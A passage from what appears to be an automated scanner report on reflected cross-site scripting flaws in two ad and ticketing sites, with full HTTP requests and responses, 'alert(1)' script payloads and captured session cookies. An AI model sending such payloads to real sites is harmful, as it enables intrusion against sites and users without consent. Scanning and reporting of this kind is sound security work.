Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com5fdec"><script>alert(1)</script>c64d1920d72/1161003160/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.82. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1936689153@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1936689153@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49b67"><script>alert(1)</script>5a1d01317d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1936689153@x9649b67"><script>alert(1)</script>5a1d01317d2?&XE&Page=HomeMedia%20Innovation%20Group%20-%20Home&tax23_RefDocLoc=http://www.fakereferrerdominator.com/referrerPathName&if_nt_CookieAccept=Y&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/765672396/x9649b67"><script>alert(1)</script>5a1d01317d2/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.83. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5cbb"><script>alert(1)</script>fa065146d48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSamplec5cbb"><script>alert(1)</script>fa065146d48/wwww.themig.com/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSamplec5cbb"><script>alert(1)</script>fa065146d48/wwww.themig.com/1106225608/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.84. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f339e"><script>alert(1)</script>b7dc5d37df2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.comf339e"><script>alert(1)</script>b7dc5d37df2/1@x96?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 345
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.comf339e"><script>alert(1)</script>b7dc5d37df2/1189746631/x96/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.85. http://b3.mookie1.com/2/zzzSample/wwww.themig.com/1@x96 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/zzzSample/wwww.themig.com/1@x96

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a29e6"><script>alert(1)</script>f274f4d0047 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/zzzSample/wwww.themig.com/1@x96a29e6"><script>alert(1)</script>f274f4d0047?&XE&Site=TheMig.com&Section=we&XE HTTP/1.1
Host: b3.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 336
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/zzzSample/wwww.themig.com/316215392/x96a29e6"><script>alert(1)</script>f274f4d0047/default/empty.gif/72634857383031536e39414143615847?x" target="_top">
...[SNIP]...

4.86. http://bing.fansnap.com/checkout/index/415814268 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fdd36(a)b5a28ad72b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268fdd36(a)b5a28ad72b3?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:38:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 1065
ETag: "af793ec12b8ef7e3d482d9a63a70492e"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311100699; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:38:19 GMT
Set-Cookie: _fancat_session=BAh7DjoPc2Vzc2lvbl9pZCIlYWI2NmZiYzJkODZiNmU5YzJkZWMzM2M3ODA1MTYyMjY6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1y2huAp0RNmQY6C29mZnNldGn%2BkJ06DmJnX3NyY19pZGkB%2FzoKYmdfbHBJIgH%2FaHR0cDovL2JpbmcuZmFuc25hcC5jb20vY2hlY2tvdXQvaW5kZXgvNDE1ODE0MjY4ZmRkMzYoYSliNWEyOGFkNzJiMz9jdHg9YyUzRHRpeCUzQm10JTNEaW50JTNCdHNwJTNEMCUzQmR0JTNEMiUzQmxwb3MlM0QwJTNCdCUzRGJ2JmNoPWJpbmcmcXVhbnRpdHk9MiZscD10cnVlJnBvY3R4PXJhbmslM0QzNiUzQmNyYXdsU2NvcmUlM0RudWxsJTNCcG9wMSUzRDAuMDM3NCUzQnBvcDIlM0QwLjAzNzQlM0Jwb3AzJTNEMC4wMzc0JTNCJmFmbT0mdWV0PS03BjoGRUY6D2JnX3JlZmVyZXIiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWw6EGJnX3Zpc2l0X2lkafxPShHbOhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2ODMwMjc1NTg1OhFiZ19zdHlsZV9pZHNJIgAGOwtGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQA8%3D--8b58f2aa8383c776e3b27cf6770cd031eb896f39; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11928
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 415814268fdd36(a)b5a28ad72b3, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=n
...[SNIP]...

4.87. http://bing.fansnap.com/checkout/index/415814268 [afm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the afm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44bca'%3balert(1)//30702b33e3b was submitted in the afm parameter. This input was echoed as 44bca';alert(1)//30702b33e3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=44bca'%3balert(1)//30702b33e3b&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "30d905cbedba4b014b953a02b8457d35"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AA5lqQBjoLb2Zmc2V0af6QnQ%3D%3D--dcb6ed181ab99f223d61120c2acc6c104c9dca9f; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12048
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
=2;lpos=0;t=bv'), fakeResult: 'none', salePrice: 49.99, roundedPrice: 50, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '44bca';alert(1)//30702b33e3b' });
//]]>
...[SNIP]...

4.88. http://bing.fansnap.com/checkout/index/415814268 [ch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/415814268

Issue detail

The value of the ch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edce3'%3balert(1)//af024862ed3 was submitted in the ch parameter. This input was echoed as edce3';alert(1)//af024862ed3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/415814268?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D2%3Blpos%3D0%3Bt%3Dbv&ch=bingedce3'%3balert(1)//af024862ed3&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4DolT2MBjoLb2Zmc2V0af6QnQ%3D%3D--e21be7bef8d3eb3e1a0f021150343c885b293e8e

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 144
ETag: "366b292b7a2d3acc5d4de62f74d56d95"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: ver=1; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: lvd=1311100531; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:31 GMT
Set-Cookie: _fancat_session=BAh7GDoPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4BHivWNBjoLb2Zmc2V0af6QnToLc3JjX2lkaQH%2FOgdscEkiAf9odHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTU4MTQyNjg%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDIlM0JscG9zJTNEMCUzQnQlM0RidiZjaD1iaW5nZWRjZTMnJTNiYWxlcnQoMSkvL2FmMDI0ODYyZWQzJnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM